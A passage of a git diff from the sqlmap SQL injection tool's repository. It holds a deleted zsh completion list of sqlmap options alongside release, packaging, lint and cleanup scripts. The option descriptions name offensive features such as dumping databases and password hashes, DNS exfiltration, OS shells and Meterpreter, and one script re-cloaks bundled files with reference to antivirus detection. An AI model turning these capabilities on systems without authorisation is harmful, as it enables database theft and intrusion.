certificate (key_file,cert_file)]:ACERT:_files' \ - '(--proxy)'--proxy=-'[Use a HTTP proxy to connect to the target url]:PROXY' \ - '(--proxy-cred)'--proxy-cred=-'[HTTP proxy authentication credentials (name:password)]:PCRED' \ - '(--ignore-proxy)'--ignore-proxy'[Ignore system default HTTP proxy]' \ - '(--delay)'--delay=-'[Delay in seconds between each HTTP request]:DELAY' \ - '(--timeout)'--timeout=-'[Seconds to wait before timeout connection (default 30)]:TIMEOUT' \ - '(--retries)'--retries=-'[Retries when the connection timeouts (default 3)]:RETRIES' \ - '(--scope)'--scope=-'[Regexp to filter targets from provided proxy log]:SCOPE' \ - '(--safe-url)'--safe-url=-'[Url address to visit frequently during testing]:SAFURL' \ - '(--safe-freq)'--safe-freq=-'[Test requests between two visits to a given safe url]:SAFREQ' \ - '(--skip-urlencode)'--skip-urlencode'[Skip URL encoding of payload data]' \ - '(--eval)'--eval=-'[Evaluate provided Python code before the request (e.g.]:EVALCODE' \ - '(-o)'-o'[Turn on all optimization switches]' \ - '(--predict-output)'--predict-output'[Predict common queries output]' \ - '(--keep-alive)'--keep-alive'[Use persistent HTTP(s) connections]' \ - '(--null-connection)'--null-connection'[Retrieve page length without actual HTTP response body]' \ - '(--threads)'--threads=-'[Max number of concurrent HTTP(s) requests (default 1)]:THREADS' \ - '(-p)'-p+'[Testable parameter(s)]:TESTPARAMETER' \ - '(--dbms)'--dbms=-'[Force back-end DBMS to this value]:DBMS:->list-dbms' \ - '(--os)'--os=-'[Force back-end DBMS operating system to this value]:OS:->list-os' \ - '(--invalid-bignum)'--invalid-bignum'[Use big numbers for invalidating values]' \ - '(--invalid-logical)'--invalid-logical'[Use logical operations for invalidating values]' \ - '(--no-cast)'--no-cast'[Turn off payload casting mechanism]' \ - '(--no-escape)'--no-unescape'[Turn off string escaping mechanism]' \ - '(--prefix)'--prefix=-'[Injection payload prefix string]:PREFIX' \ - '(--suffix)'--suffix=-'[Injection payload suffix string]:SUFFIX' \ - '(--skip)'--skip=-'[Skip testing for given parameter(s)]:SKIP' \ - '(--tamper)'--tamper=-'[Use given script(s) for tampering injection data]:TAMPER' \ - '(--level)'--level=-'[Level of tests to perform (1-5, default 1)]:LEVEL (1-5), default 1' \ - '(--risk)'--risk=-'[Risk of tests to perform (0-3, default 1)]:RISK (0-3), default 1' \ - '(--string)'--string=-'[String to match when query is evaluated to True]:STRING' \ - '(--not-string)'--not-string=-'[String to match when query is evaluated to False]:NOTSTRING' \ - '(--regexp)'--regexp=-'[Regexp to match when query is evaluated to True]:REGEXP' \ - '(--code)'--code=-'[HTTP code to match when query is evaluated to True]' \ - '(--text-only)'--text-only'[Compare pages based only on the textual content]' \ - '(--titles)'--titles'[Compare pages based only on their titles]' \ - '(--technique)'--technique=-'[SQL injection techniques to test for (default "BEUSTQ")]:TECH:->list-techniques' \ - '(--time-sec)'--time-sec=-'[Seconds to delay the DBMS response (default 5)]:TIMESEC' \ - '(--union-cols)'--union-cols=-'[Range of columns to test for UNION query SQL injection]:UCOLS' \ - '(--union-char)'--union-char=-'[Character to use for bruteforcing number of columns]:UCHAR' \ - '(--dns-domain)'--dns-domain=-'[Domain name used for DNS exfiltration attack]:DNSDOMAIN' \ - '(--second-order)'--second-order=-'[Resulting page url searched for second-order response]:SECONDORDER' \ - '(-f,--fingerprint)'{-f,--fingerprint}'[Perform an extensive DBMS version fingerprint]' \ - '(-a,--all)'{-a,--all}'[Retrieve everything]' \ - '(-b,--banner)'{-b,--banner}'[Retrieve DBMS banner]' \ - '(--current-user)'--current-user'[Retrieve DBMS current user]' \ - '(--current-db)'--current-db'[Retrieve DBMS current database]' \ - '(--hostname)'--hostname'[Retrieve DBMS server hostname]' \ - '(--is-dba)'--is-dba'[Detect if the DBMS current user is DBA]' \ - '(--users)'--users'[Enumerate DBMS users]' \ - '(--passwords)'--passwords'[Enumerate DBMS users password hashes]' \ - '(--privileges)'--privileges'[Enumerate DBMS users privileges]' \ - '(--roles)'--roles'[Enumerate DBMS users roles]' \ - '(--dbs)'--dbs'[Enumerate DBMS databases]' \ - '(--tables)'--tables'[Enumerate DBMS database tables]' \ - '(--columns)'--columns'[Enumerate DBMS database table columns]' \ - '(--schema)'--schema'[Enumerate DBMS schema]' \ - '(--count)'--count'[Retrieve number of entries for table(s)]' \ - '(--dump)'--dump'[Dump DBMS database table entries]' \ - '(--dump-all)'--dump-all'[Dump all DBMS databases tables entries]' \ - '(--search)'--search'[Search column(s), table(s) and/or database name(s)]' \ - '(-D)'-D+'[DBMS database to enumerate]:DB' \ - '(-T)'-T+'[DBMS database table to enumerate]:TBL' \ - '(-C)'-C+'[DBMS database table column to enumerate]:COL' \ - '(-U)'-U+'[DBMS user to enumerate]:USER' \ - '(--exclude-sysdbs)'--exclude-sysdbs'[Exclude DBMS system databases when enumerating tables]' \ - '(--start)'--start=-'[First query output entry to retrieve]:LIMITSTART' \ - '(--stop)'--stop=-'[Last query output entry to retrieve]:LIMITSTOP' \ - '(--first)'--first=-'[First query output word character to retrieve]:FIRSTCHAR' \ - '(--last)'--last=-'[Last query output word character to retrieve]:LASTCHAR' \ - '(--sql-query)'--sql-query=-'[SQL statement to be executed]:QUERY' \ - '(--sql-shell)'--sql-shell'[Prompt for an interactive SQL shell]' \ - '(--sql-file)'--sql-file=-'[Execute SQL statements from given file(s)]:SQLFILE:_files' \ - '(--common-tables)'--common-tables'[Check existence of common tables]' \ - '(--common-columns)'--common-columns'[Check existence of common columns]' \ - '(--udf-inject)'--udf-inject'[Inject custom user-defined functions]' \ - '(--shared-lib)'--shared-lib=-'[Local path of the shared library]:SHLIB' \ - '(--file-read)'--file-read=-'[Read a file from the back-end DBMS file system]:RFILE' \ - '(--file-write)'--file-write=-'[Write a local file on the back-end DBMS file system]:WFILE' \ - '(--file-dest)'--file-dest=-'[Back-end DBMS absolute filepath to write to]:DFILE' \ - '(--os-cmd)'--os-cmd=-'[Execute an operating system command]:OSCMD' \ - '(--os-shell)'--os-shell'[Prompt for an interactive operating system shell]' \ - '(--os-pwn)'--os-pwn'[Prompt for an out-of-band shell, meterpreter or VNC]' \ - '(--os-smbrelay)'--os-smbrelay'[One click prompt for an OOB shell, meterpreter or VNC]' \ - '(--os-bof)'--os-bof'[Stored procedure buffer overflow exploitation]' \ - '(--priv-esc)'--priv-esc'[Database process user privilege escalation]' \ - '(--msf-path)'--msf-path=-'[Local path where Metasploit Framework is installed]:MSFPATH' \ - '(--tmp-path)'--tmp-path=-'[Remote absolute path of temporary files directory]:TMPPATH' \ - '(--reg-read)'--reg-read'[Read a Windows registry key value]' \ - '(--reg-add)'--reg-add'[Write a Windows registry key value data]' \ - '(--reg-del)'--reg-del'[Delete a Windows registry key value]' \ - '(--reg-key)'--reg-key=-'[Windows registry key]:REGKEY' \ - '(--reg-value)'--reg-value=-'[Windows registry key value]:REGVAL' \ - '(--reg-data)'--reg-data=-'[Windows registry key value data]:REGDATA' \ - '(--reg-type)'--reg-type=-'[Windows registry key value type]:REGTYPE' \ - '(-t)'-t+'[Log all HTTP traffic into a textual file]:TRAFFICFILE' \ - '(--batch)'--batch'[Never ask for user input, use the default behaviour]' \ - '(--charset)'--charset=-'[Force character encoding used for data retrieval]:CHARSET' \ - '(--check-tor)'--check-tor'[Check to see if Tor is used properly]' \ - '(--crawl)'--crawl=-'[Crawl the website starting from the target url]:CRAWLDEPTH' \ - '(--csv-del)'--csv-del=-'[Delimiting character used in CSV output (default is ,)]:CSVDEL' \ - '(--dbms-cred)'--dbms-cred=-'[DBMS authentication credentials (user:password)]:DBMS authentication credentials' \ - '(--eta)'--eta'[Display for each output the estimated time of arrival]' \ - '(--flush-session)'--flush-session'[Flush session files for current target]' \ - '(--forms)'--forms'[Parse and test forms on target url]' \ - '(--fresh-queries)'--fresh-queries'[Ignores query results stored in session file]' \ - '(--hex)'--hex'[Uses DBMS hex function(s) for data retrieval]' \ - '(--output-dir)'--output-dir=-'[Custom output directory path]:ODIR' \ - '(--parse-errors)'--parse-errors'[Parse and display DBMS error messages from responses]' \ - '(--save)'--save'[Save options to a configuration INI file]' \ - '(--tor)'--tor'[Use Tor anonymity network]' \ - '(--tor-port)'--tor-port=-'[Set Tor proxy port other than default]:TORPORT' \ - '(--tor-type)'--tor-type=-'[Set Tor proxy type (HTTP - default, SOCKS4 or SOCKS5)]:TORTYPE' \ - '(--update)'--update'[Update sqlmap]' \ - '(-z)'-z+'[Use short mnemonics (e.g. flu,bat,ban,tec=EU)]:MNEMONICS' \ - '(--check-payload)'--check-payload'[Offline WAF/IPS/IDS payload detection testing]' \ - '(--check-waf)'--check-waf'[Check for existence of WAF/IPS/IDS protection]' \ - '(--cleanup)'--cleanup'[Clean up the DBMS by sqlmap specific UDF and tables]' \ - '(--dependencies)'--dependencies'[Check for missing (non-core) sqlmap dependencies]' \ - '(--disable-coloring)'--disable-coloring'[Disable console output coloring]' \ - '(--gpage)'--gpage=-'[Use Google dork results from specified page number]:GOOGLEPAGE' \ - '(--mobile)'--mobile'[Imitate smartphone through HTTP User-Agent header]' \ - '(--page-rank)'--page-rank'[Display page rank (PR) for Google dork results]' \ - '(--purge-output)'--purge-output'[Safely remove all content from output directory]' \ - '(--smart)'--smart'[Conduct through tests only if positive heuristic(s)]' \ - '(--test-filter)'--test-filter=-'[Select tests by payloads and/or titles (e.g. ROW)]:test-filter' \ - '(--wizard)'--wizard'[Simple wizard interface for beginner users]' && return 0 - -case "$state" in - list-dbms) - _values -S : 'DBMS' 'access' 'db2' 'firebird' 'maxdb' 'mssqlserver' 'mysql' 'oracle' 'postgresql' \ - 'sqlite' 'sybase' - ;; - list-os) - _values -S : 'os' 'Linux' 'Windows' - ;; - list-techniques) - _values -S : 'technique' \ - 'B[Boolean]' 'E[Error]' 'U[Union]' 'S[Stacked]' 'T[Time]' - ;; -esac - -return 0 diff --git a/extra/shutils/autocompletion.sh b/extra/shutils/autocompletion.sh new file mode 100755 index 00000000000..edaccd73b62 --- /dev/null +++ b/extra/shutils/autocompletion.sh @@ -0,0 +1,9 @@ +#/usr/bin/env bash + +# source ./extra/shutils/autocompletion.sh + +DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )" +WORDLIST=`python "$DIR/../../sqlmap.py" -hh | grep -Eo '\s\--?\w[^ =,]*' | grep -vF '..' | paste -sd "" -` + +complete -W "$WORDLIST" sqlmap +complete -W "$WORDLIST" ./sqlmap.py diff --git a/extra/shutils/blanks.sh b/extra/shutils/blanks.sh index dc91d6b1f60..3ba88a266ac 100755 --- a/extra/shutils/blanks.sh +++ b/extra/shutils/blanks.sh @@ -1,7 +1,7 @@ #!/bin/bash -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission # Removes trailing spaces from blank lines inside project files find . -type f -iname '*.py' -exec sed -i 's/^[ \t]*$//' {} \; diff --git a/extra/shutils/drei.sh b/extra/shutils/drei.sh new file mode 100755 index 00000000000..c334b972e84 --- /dev/null +++ b/extra/shutils/drei.sh @@ -0,0 +1,9 @@ +#!/bin/bash + +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission + +# Stress test against Python3(.14) + +for i in $(find . -iname "*.py" | grep -v __init__); do PYTHONWARNINGS=all python3.14 -m compileall $i | sed 's/Compiling/Checking/g'; done +source `dirname "$0"`"/junk.sh" diff --git a/extra/shutils/duplicates.py b/extra/shutils/duplicates.py old mode 100644 new mode 100755 index 1e27c6fc39e..5de6e357e57 --- a/extra/shutils/duplicates.py +++ b/extra/shutils/duplicates.py @@ -1,27 +1,30 @@ #!/usr/bin/env python -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission # Removes duplicate entries in wordlist like files +from __future__ import print_function + import sys -if len(sys.argv) > 0: - items = list() +if __name__ == "__main__": + if len(sys.argv) > 1: + items = list() - with open(sys.argv[1], 'r') as f: - for item in f.readlines(): - item = item.strip() - try: - str.encode(item) - if item in items: - if item: - print item - else: - items.append(item) - except: - pass + with open(sys.argv[1], 'r') as f: + for item in f: + item = item.strip() + try: + str.encode(item) + if item in items: + if item: + print(item) + else: + items.append(item) + except: + pass - with open(sys.argv[1], 'w+') as f: - f.writelines("\n".join(items)) + with open(sys.argv[1], 'w+') as f: + f.writelines("\n".join(items)) diff --git a/extra/shutils/junk.sh b/extra/shutils/junk.sh new file mode 100755 index 00000000000..544ccf12163 --- /dev/null +++ b/extra/shutils/junk.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission + +find . -type d -name "__pycache__" -exec rm -rf {} \; &>/dev/null +find . -name "*.pyc" -exec rm -f {} \; &>/dev/null diff --git a/extra/shutils/newlines.py b/extra/shutils/newlines.py new file mode 100644 index 00000000000..fe28a35ba99 --- /dev/null +++ b/extra/shutils/newlines.py @@ -0,0 +1,30 @@ +#! /usr/bin/env python + +from __future__ import print_function + +import os +import sys + +def check(filepath): + if filepath.endswith(".py"): + content = open(filepath, "rb").read() + pattern = "\n\n\n".encode("ascii") + + if pattern in content: + index = content.find(pattern) + print(filepath, repr(content[index - 30:index + 30])) + +if __name__ == "__main__": + try: + BASE_DIRECTORY = sys.argv[1] + except IndexError: + print("no directory specified, defaulting to current working directory") + BASE_DIRECTORY = os.getcwd() + + print("looking for *.py scripts in subdirectories of '%s'" % BASE_DIRECTORY) + for root, dirs, files in os.walk(BASE_DIRECTORY): + if any(_ in root for _ in ("extra", "thirdparty")): + continue + for name in files: + filepath = os.path.join(root, name) + check(filepath) diff --git a/extra/shutils/pep8.sh b/extra/shutils/pep8.sh deleted file mode 100755 index 7abe562b5a0..00000000000 --- a/extra/shutils/pep8.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission - -# Runs pep8 on all python files (prerequisite: apt-get install pep8) -find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pep8 '{}' \; diff --git a/extra/shutils/postcommit-hook.sh b/extra/shutils/postcommit-hook.sh new file mode 100755 index 00000000000..07d91a222b7 --- /dev/null +++ b/extra/shutils/postcommit-hook.sh @@ -0,0 +1,34 @@ +#!/bin/bash + +: ' +cat > .git/hooks/post-commit << EOF +#!/bin/bash + +source ./extra/shutils/postcommit-hook.sh +EOF + +chmod +x .git/hooks/post-commit +' + +SETTINGS="../../lib/core/settings.py" +PYPI="../../extra/shutils/pypi.sh" + +declare -x SCRIPTPATH="${0}" + +FULLPATH=${SCRIPTPATH%/*}/$SETTINGS + +if [ -f $FULLPATH ] +then + LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"') + declare -a LINE + NEW_TAG=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); print '.'.join(_[:-1]) if len(_) == 4 and _[-1] == '0' else ''" "$LINE") + if [ -n "$NEW_TAG" ] + then + #git commit -am "Automatic monthly tagging" + echo "Creating new tag ${NEW_TAG}" + git tag $NEW_TAG + git push origin $NEW_TAG + echo "Going to push PyPI package" + /bin/bash ${SCRIPTPATH%/*}/$PYPI + fi +fi diff --git a/extra/shutils/precommit-hook.sh b/extra/shutils/precommit-hook.sh new file mode 100755 index 00000000000..300916ae369 --- /dev/null +++ b/extra/shutils/precommit-hook.sh @@ -0,0 +1,42 @@ +#!/bin/bash + +: ' +cat > .git/hooks/pre-commit << EOF +#!/bin/bash + +source ./extra/shutils/precommit-hook.sh +EOF + +chmod +x .git/hooks/pre-commit +' + +PROJECT="../../" +SETTINGS="../../lib/core/settings.py" +DIGEST="../../data/txt/sha256sums.txt" + +declare -x SCRIPTPATH="${0}" + +PROJECT_FULLPATH=${SCRIPTPATH%/*}/$PROJECT +SETTINGS_FULLPATH=${SCRIPTPATH%/*}/$SETTINGS +DIGEST_FULLPATH=${SCRIPTPATH%/*}/$DIGEST + +git diff $SETTINGS_FULLPATH | grep "VERSION =" > /dev/null && exit 0 + +if [ -f $SETTINGS_FULLPATH ] +then + LINE=$(grep -o ${SETTINGS_FULLPATH} -e '^VERSION = "[0-9.]*"') + declare -a LINE + INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.extend([0] * (4 - len(_))); _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE") + if [ -n "$INCREMENTED" ] + then + sed -i "s/${LINE}/${INCREMENTED}/" $SETTINGS_FULLPATH + echo "Updated ${INCREMENTED} in ${SETTINGS_FULLPATH}" + else + echo "Something went wrong in VERSION increment" + exit 1 + fi + git add "$SETTINGS_FULLPATH" +fi + +cd $PROJECT_FULLPATH && git ls-files | sort | uniq | grep -Pv '^\.|sha256' | xargs sha256sum > $DIGEST_FULLPATH && cd - +git add "$DIGEST_FULLPATH" diff --git a/extra/shutils/pycodestyle.sh b/extra/shutils/pycodestyle.sh new file mode 100755 index 00000000000..8b3f0121f0f --- /dev/null +++ b/extra/shutils/pycodestyle.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission + +# Runs pycodestyle on all python files (prerequisite: pip install pycodestyle) +find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pycodestyle --ignore=E501,E302,E305,E722,E402 '{}' \; diff --git a/extra/shutils/pydiatra.sh b/extra/shutils/pydiatra.sh new file mode 100755 index 00000000000..20c62373daf --- /dev/null +++ b/extra/shutils/pydiatra.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission + +# Runs py3diatra on all python files (prerequisite: pip install pydiatra) +find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec py3diatra '{}' \; | grep -v bare-except diff --git a/extra/shutils/pyflakes.sh b/extra/shutils/pyflakes.sh old mode 100644 new mode 100755 index 815b98e7c23..cbe37a7a0a8 --- a/extra/shutils/pyflakes.sh +++ b/extra/shutils/pyflakes.sh @@ -1,7 +1,7 @@ #!/bin/bash -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission # Runs pyflakes on all python files (prerequisite: apt-get install pyflakes) -find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes '{}' \; +find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes3 '{}' \; | grep -v "redefines '_'" diff --git a/extra/shutils/pylint.py b/extra/shutils/pylint.py deleted file mode 100644 index 440f638a6d6..00000000000 --- a/extra/shutils/pylint.py +++ /dev/null @@ -1,50 +0,0 @@ -#! /usr/bin/env python - -# Runs pylint on all python scripts found in a directory tree -# Reference: http://rowinggolfer.blogspot.com/2009/08/pylint-recursively.html - -import os -import re -import sys - -total = 0.0 -count = 0 - -__RATING__ = False - -def check(module): - global total, count - - if module[-3:] == ".py": - - print "CHECKING ", module - pout = os.popen("pylint --rcfile=/dev/null %s" % module, 'r') - for line in pout: - if re.match("E....:.", line): - print line - if __RATING__ and "Your code has been rated at" in line: - print line - score = re.findall("\d.\d\d", line)[0] - total += float(score) - count += 1 - -if __name__ == "__main__": - try: - print sys.argv - BASE_DIRECTORY = sys.argv[1] - except IndexError: - print "no directory specified, defaulting to current working directory" - BASE_DIRECTORY = os.getcwd() - - print "looking for *.py scripts in subdirectories of ", BASE_DIRECTORY - for root, dirs, files in os.walk(BASE_DIRECTORY): - if any(_ in root for _ in ("extra", "thirdparty")): - continue - for name in files: - filepath = os.path.join(root, name) - check(filepath) - - if __RATING__: - print "==" * 50 - print "%d modules found" % count - print "AVERAGE SCORE = %.02f" % (total / count) diff --git a/extra/shutils/pypi.sh b/extra/shutils/pypi.sh new file mode 100755 index 00000000000..3cdbdf5d714 --- /dev/null +++ b/extra/shutils/pypi.sh @@ -0,0 +1,192 @@ +#!/bin/bash +set -euo pipefail +IFS=$'\n\t' + +if [ ! -f ~/.pypirc ]; then + echo "File ~/.pypirc is missing" + exit 1 +fi + +declare -x SCRIPTPATH="${0}" +SETTINGS="${SCRIPTPATH%/*}/../../lib/core/settings.py" +VERSION=$(cat $SETTINGS | grep -E "^VERSION =" | cut -d '"' -f 2 | cut -d '.' -f 1-3) +TYPE=pip +TMP_DIR="$(mktemp -d -t pypi.XXXXXXXX)" +cleanup() { rm -rf -- "${TMP_DIR:?}"; } +trap cleanup EXIT +cd "$TMP_DIR" +cat > "$TMP_DIR/setup.py" << EOF +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from setuptools import setup, find_packages + +setup( + name='sqlmap', + version='$VERSION', + description='Automatic SQL injection and database takeover tool', + long_description=open('README.rst').read(), + long_description_content_type='text/x-rst', + author='Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar', + author_email='bernardo@sqlmap.org, miroslav@sqlmap.org', + url='https://sqlmap.org', + project_urls={ + 'Documentation': 'https://github.com/sqlmapproject/sqlmap/wiki', + 'Source': 'https://github.com/sqlmapproject/sqlmap/', + 'Tracker': 'https://github.com/sqlmapproject/sqlmap/issues', + }, + download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip', + license='GNU General Public License v2 (GPLv2)', + packages=['sqlmap'], + package_dir={'sqlmap':'sqlmap'}, + include_package_data=True, + zip_safe=False, + # https://pypi.python.org/pypi?%3Aaction=list_classifiers + classifiers=[ + 'Development Status :: 5 - Production/Stable', + 'License :: OSI Approved :: GNU General Public License v2 (GPLv2)', + 'Natural Language :: English', + 'Operating System :: OS Independent', + 'Programming Language :: Python', + 'Environment :: Console', + 'Topic :: Database', + 'Topic :: Security', + ], + entry_points={ + 'console_scripts': [ + 'sqlmap = sqlmap.sqlmap:main', + ], + }, +) +EOF +wget "https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip" -O sqlmap.zip +unzip sqlmap.zip +rm sqlmap.zip +mv "sqlmap-$VERSION" sqlmap +cat > sqlmap/__init__.py << EOF +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os +import sys + +sys.dont_write_bytecode = True +sys.path.insert(0, os.path.dirname(os.path.abspath(__file__))) +EOF +cat > README.rst << "EOF" +sqlmap +====== + +|Python 2.7|3.x| |License| |X| + +sqlmap is an open source penetration testing tool that automates the +process of detecting and exploiting SQL injection flaws and taking over +of database servers. It comes with a powerful detection engine, many +niche features for the ultimate penetration tester and a broad range of +switches lasting from database fingerprinting, over data fetching from +the database, to accessing the underlying file system and executing +commands on the operating system via out-of-band connections. + +Screenshots +----------- + +.. figure:: https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png + :alt: Screenshot + + +You can visit the `collection of +screenshots `__ +demonstrating some of features on the wiki. + +Installation +------------ + +You can use pip to install and/or upgrade the sqlmap to latest (monthly) tagged version with: :: + + pip install --upgrade sqlmap + +Alternatively, you can download the latest tarball by clicking +`here `__ or +latest zipball by clicking +`here `__. + +If you prefer fetching daily updates, you can download sqlmap by cloning the +`Git `__ repository: + +:: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap works out of the box with +`Python `__ version **2.7** and +**3.x** on any platform. + +Usage +----- + +To get a list of basic options and switches use: + +:: + + sqlmap -h + +To get a list of all options and switches use: + +:: + + sqlmap -hh + +You can find a sample run `here `__. To +get an overview of sqlmap capabilities, list of supported features and +description of all options and switches, along with examples, you are +advised to consult the `user's +manual `__. + +Links +----- + +- Homepage: https://sqlmap.org +- Download: + `.tar.gz `__ + or `.zip `__ +- Commits RSS feed: + https://github.com/sqlmapproject/sqlmap/commits/master.atom +- Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +- User's manual: https://github.com/sqlmapproject/sqlmap/wiki +- Frequently Asked Questions (FAQ): + https://github.com/sqlmapproject/sqlmap/wiki/FAQ +- X: https://x.com/sqlmap +- Demos: http://www.youtube.com/user/inquisb/videos +- Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots + +.. |Python 2.7|3.x| image:: https://img.shields.io/badge/python-2.7|3.x-yellow.svg + :target: https://www.python.org/ +.. |License| image:: https://img.shields.io/badge/license-GPLv2-red.svg + :target: https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE +.. |X| image:: https://img.shields.io/badge/x-@sqlmap-blue.svg + :target: https://x.com/sqlmap + +.. pandoc --from=markdown --to=rst --output=README.rst sqlmap/README.md +.. http://rst.ninjs.org/ +EOF +sed -i "s/^VERSION =.*/VERSION = \"$VERSION\"/g" sqlmap/lib/core/settings.py +sed -i "s/^TYPE =.*/TYPE = \"$TYPE\"/g" sqlmap/lib/core/settings.py +: > MANIFEST.in +while IFS= read -r -d '' file; do + case "$file" in + *.git|*.yml) continue ;; + esac + echo "include $file" >> MANIFEST.in +done < <(find sqlmap -type f -print0) +python setup.py sdist bdist_wheel +twine check dist/* +twine upload --config-file=~/.pypirc dist/* +rm -rf "$TMP_DIR" diff --git a/extra/shutils/recloak.sh b/extra/shutils/recloak.sh new file mode 100755 index 00000000000..557ea51d96f --- /dev/null +++ b/extra/shutils/recloak.sh @@ -0,0 +1,16 @@ +#!/bin/bash + +# NOTE: this script is for dev usage after AV something something + +DIR=$(cd -P -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd -P) + +cd $DIR/../.. +for file in $(find -regex ".*\.[a-z]*_" -type f | grep -v wordlist); do python extra/cloak/cloak.py -d -i $file; done + +cd $DIR/../cloak +sed -i 's/KEY = .*/KEY = b"'`python -c 'import random; import string; print("".join(random.sample(string.ascii_letters + string.digits, 16)))'`'"/g' cloak.py + +cd $DIR/../.. +for file in $(find -regex ".*\.[a-z]*_" -type f | grep -v wordlist); do python extra/cloak/cloak.py -i `echo $file | sed 's/_$//g'`; done + +git clean -f > /dev/null diff --git a/extra/shutils/regressiontest.py b/extra/shutils/regressiontest.py deleted file mode 100644 index 0ec23769f88..00000000000 --- a/extra/shutils/regressiontest.py +++ /dev/null @@ -1,152 +0,0 @@ -#!/usr/bin/env python - -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission - -import codecs -import inspect -import os -import re -import smtplib -import subprocess -import sys -import time -import traceback - -from email.mime.multipart import MIMEMultipart -from email.mime.text import MIMEText - -sys.path.append(os.path.normpath("%s/../../" % os.path.dirname(inspect.getfile(inspect.currentframe())))) - -from lib.core.revision import getRevisionNumber - -TIME = time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime()) -SQLMAP_HOME = "/opt/sqlmap" -REVISION = getRevisionNumber() - -SMTP_SERVER = "127.0.0.1" -SMTP_PORT = 25 -SMTP_TIMEOUT = 30 -FROM = "regressiontest@sqlmap.org" -#TO = "dev@sqlmap.org" -TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"] -SUBJECT = "Regression test on %s using revision %s" % (TIME, REVISION) - -def prepare_email(content): - global FROM - global TO - global SUBJECT - - msg = MIMEMultipart() - msg["Subject"] = SUBJECT - msg["From"] = FROM - msg["To"] = TO if isinstance(TO, basestring) else ",".join(TO) - - msg.attach(MIMEText(content)) - - return msg - -def send_email(msg): - global SMTP_SERVER - global SMTP_PORT - global SMTP_TIMEOUT - - try: - s = smtplib.SMTP(host=SMTP_SERVER, port=SMTP_PORT, timeout=SMTP_TIMEOUT) - s.sendmail(FROM, TO, msg.as_string()) - s.quit() - # Catch all for SMTP exceptions - except smtplib.SMTPException, e: - print "Failure to send email: %s" % str(e) - -def main(): - global SUBJECT - - content = "" - test_counts = [] - attachments = {} - - command_line = "python /opt/sqlmap/sqlmap.py --live-test" - proc = subprocess.Popen(command_line, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) - - proc.wait() - stdout, stderr = proc.communicate() - - if stderr: - msg = prepare_email("Execution of regression test failed with error:\n\n%s" % stderr) - send_email(msg) - sys.exit(1) - - failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing item \"(.+)\" )?\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout, re.M) - - for failed_test in failed_tests: - title = failed_test[0] - test_count = int(failed_test[1]) - parse = failed_test[3] if failed_test[3] else None - output_folder = failed_test[4] - traceback = False if failed_test[5] == "False" else bool(failed_test[5]) - detected = False if failed_test[6] else True - - test_counts.append(test_count) - - console_output_file = os.path.join(output_folder, "console_output") - log_file = os.path.join(output_folder, "debiandev", "log") - traceback_file = os.path.join(output_folder, "traceback") - - if os.path.exists(console_output_file): - console_output_fd = codecs.open(console_output_file, "rb", "utf8") - console_output = console_output_fd.read() - console_output_fd.close() - attachments[test_count] = str(console_output) - - if os.path.exists(log_file): - log_fd = codecs.open(log_file, "rb", "utf8") - log = log_fd.read() - log_fd.close() - - if os.path.exists(traceback_file): - traceback_fd = codecs.open(traceback_file, "rb", "utf8") - traceback = traceback_fd.read() - traceback_fd.close() - - content += "Failed test 